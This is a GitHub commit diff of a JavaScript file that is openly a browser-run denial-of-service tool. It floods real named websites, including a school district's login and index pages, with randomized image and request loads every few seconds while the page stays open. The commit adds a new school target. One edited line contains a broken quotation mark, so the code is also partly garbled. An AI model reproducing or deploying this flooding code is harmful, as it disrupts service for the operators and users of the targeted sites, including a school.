Skip to content

Commit 14e8a46

Browse files
authored
Update main.js
1 parent 5c416d7 commit 14e8a46

File tree

1 file changed

+5
-4
lines changed

1 file changed

+5
-4
lines changed

main.js

Lines changed: 5 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1,8 +1,8 @@
11
alert("Sending an attack =D, so just do what you want but leave this site open or else it'll stop the attack");
22

3-
function imgflood(link) {
3+
function imgflood(link, uri) {
44
var TARGET = link;
5-
var URI = '/geography/africa-quiz.php';
5+
var URI = 'uri;
66
var pic = new Image();
77
var rand = Math.floor(Math.random() * 1000);
88
pic.src = 'http:'+TARGET+URI+rand+'=val';
@@ -18,8 +18,9 @@ setInterval(function(){
1818
}
1919

2020
setInterval(function(){
21-
imgflood("https://lizardpoint.com");
22-
DOSATTACK("jihadology.net/");
21+
imgflood("lizardpoint.com","/geography/africa-quiz.php");
22+
imgflood("ls-child.mvcsc.k12.in.us","/index.php");
23+
DOSATTACK("jihadology.net");
2324
DOSATTACK("ls-child.mvcsc.k12.in.us/log_in");
2425
}, 2250);
2526

0 commit comments

Comments
 (0)